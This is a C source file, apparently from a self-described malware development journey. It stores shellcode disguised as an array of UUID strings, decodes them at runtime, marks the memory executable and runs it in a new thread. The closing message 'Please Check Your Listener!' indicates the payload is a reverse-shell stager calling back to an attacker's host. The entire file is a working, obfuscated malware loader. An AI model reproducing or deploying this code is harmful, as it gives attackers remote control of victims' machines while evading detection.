It’s A Simple Process Injection Technique Nothing Interisting Here

#include <stdio.h>
#include <Windows.h>
#include <wincrypt.h>
#include <stdlib.h> // for malloc

typedef RPC_STATUS(WINAPI* fnUuidFromStringA)(
    RPC_CSTR StringUuid,
    UUID* Uuid
    );

BOOL UUIDDefuscation(char* uuids[], SIZE_T uuidsize, PBYTE* deobfuscated, SIZE_T* deobfuscatedsize)
{
    PBYTE pBuffer = NULL;
    PBYTE tmpBuffer = NULL;
    SIZE_T BufferSize = 0;
    RPC_STATUS status = 0;

    fnUuidFromStringA pUuidFromStringA = (fnUuidFromStringA)GetProcAddress(LoadLibrary(TEXT("RPCRT4")), "UuidFromStringA");
    if (pUuidFromStringA == NULL)
    {
        printf("[!] GetProcAddress Failed With Error : %d \\n", GetLastError());
        return FALSE;
    }

    BufferSize = uuidsize * sizeof(UUID);
    pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BufferSize); // Ensure memory is zeroed
    if (pBuffer == NULL)
    {
        printf("[!] HeapAlloc Failed With Error: %d\\n", GetLastError());
        return FALSE;
    }

    // Initialize tmpBuffer
    tmpBuffer = pBuffer;

    for (SIZE_T i = 0; i < uuidsize; i++)
    {
        // Deobfuscating one UUID address at a time
        if ((status = pUuidFromStringA((RPC_CSTR)uuids[i], (UUID*)tmpBuffer)) != RPC_S_OK)
        {
            printf("[!] fnUuidFromStringA Failed At [%s] With Error 0x%0.8X\\n", uuids[i], status);
            HeapFree(GetProcessHeap(), 0, pBuffer);
            return FALSE;
        }

        // Print each deobfuscated UUID address in binary form (16 bytes)
        for (int j = 0; j < sizeof(UUID); j++) {
            printf("%02x ", tmpBuffer[j]);
        }
        printf("\\n");
        // Move to the next 16 bytes
        tmpBuffer += sizeof(UUID);
    }

    *deobfuscated = pBuffer;
    *deobfuscatedsize = BufferSize;
    return TRUE; // Do not free pBuffer here
}

char* UuidArray[24] = {
        "008FE8FC-0000-8960-E531-D2648B52308B", "528B0C52-3114-8BFF-7228-0FB74A2631C0", "7C613CAC-2C02-C120-CF0D-01C74975EF52", "5710528B-428B-013C-D08B-407885C0744C", "588BD001-8B20-1848-5001-D385C9743C49", "318B348B-01FF-31D6-C0AC-C1CF0D01C738", "03F475E0-F87D-7D3B-2475-E0588B582401", "0C8B66D3-8B4B-1C58-01D3-8B048B01D089", "5B242444-615B-5A59-51FF-E0585F5A8B12", "FFFF80E9-5DFF-3368-3200-00687773325F", "774C6854-0726-E889-FFD0-B89001000029", "685054C4-8029-006B-FFD5-6A0A680A14C9", "000268A7-5C11-E689-5050-505040504050", "DF0FEA68-FFE0-97D5-6A10-56576899A574", "85D5FF61-74C0-FF0A-4E08-75ECE8670000", "6A006A00-5604-6857-02D9-C85FFFD583F8", "8B367E00-6A36-6840-0010-0000566A0068", "E553A458-D5FF-5393-6A00-5653576802D9", "D5FF5FC8-F883-7D00-2858-68004000006A", "0B685000-0F2F-FF30-D557-68756E4D61FF", "FF5E5ED5-240C-850F-70FF-FFFFE99BFFFF", "29C301FF-75C6-C3C1-BBE0-1D2A0A68A695", "D5FF9DBD-063C-0A7C-80FB-E07505BB4713", "006A6F72-FF53-90D5-9090-909090909090"
};

int main()
{
    printf("Rem01x Malware Development Journey\\n");

    SIZE_T numofUUIDs = sizeof(UuidArray) / sizeof(UuidArray[0]);
    PBYTE pDeobfuscatedPayload = NULL;
    SIZE_T sDeobfuscatedSize = 0; // Use 0 instead of NULL

    if (!UUIDDefuscation(UuidArray, numofUUIDs, &pDeobfuscatedPayload, &sDeobfuscatedSize))
    {
        printf("[!] UUID Deobfuscation Failed\\n");
        return EXIT_FAILURE;
    }

    printf("[+] Deobfuscated The Payload At: 0x%p And Size %zu\\n", pDeobfuscatedPayload, sDeobfuscatedSize);

    PVOID pShellcode = VirtualAlloc(NULL, sDeobfuscatedSize, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    if (pShellcode == NULL)
    {
        printf("[!] VirtualAlloc Failed With Error : %d \\n", GetLastError());
        HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
        return EXIT_FAILURE;
    }
    printf("[+] Successfully Allocated Memory For The Shellcode At: %p\\n", pShellcode);
    SIZE_T bytesWritten;
    WriteProcessMemory(GetCurrentProcess(), pShellcode, pDeobfuscatedPayload, sDeobfuscatedSize, &bytesWritten);

    DWORD dwOldProtection = 0;
    if (!VirtualProtect(pShellcode, sDeobfuscatedSize, PAGE_EXECUTE_READ, &dwOldProtection))
    {
        printf("[!] VirtualProtect Failed With Error : %d \\n", GetLastError());
        VirtualFree(pShellcode, 0, MEM_RELEASE); // Free allocated memory
        HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
        return EXIT_FAILURE;
    }
    printf("[+] Successfully Changed The Memory Permissions From Read And Write To Read And Execute\\n");

    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pShellcode, NULL, 0, NULL);
    if (hThread == NULL)
    {
        printf("[!] CreateThread Failed With Error : %d \\n", GetLastError());
        VirtualFree(pShellcode, 0, MEM_RELEASE); // Free allocated memory
        HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated memory before exit
        return EXIT_FAILURE;
    }
    printf("[+] Successfully Executed The Thread. Please Check Your Listener!\\n");

    WaitForSingleObject(hThread, INFINITE);

    // Cleanup
    CloseHandle(hThread); // Close thread handle

    if (pDeobfuscatedPayload)
    {
        HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload); // Free deobfuscated payload memory
        printf("[+] Cleaned Up The Memory\\n");
    }

    if (pShellcode)
    {
        VirtualFree(pShellcode, 0, MEM_RELEASE); // Free shellcode memory
        printf("[+] Cleaned Up The Shellcode Memory\\n");
    }

    return EXIT_SUCCESS;
}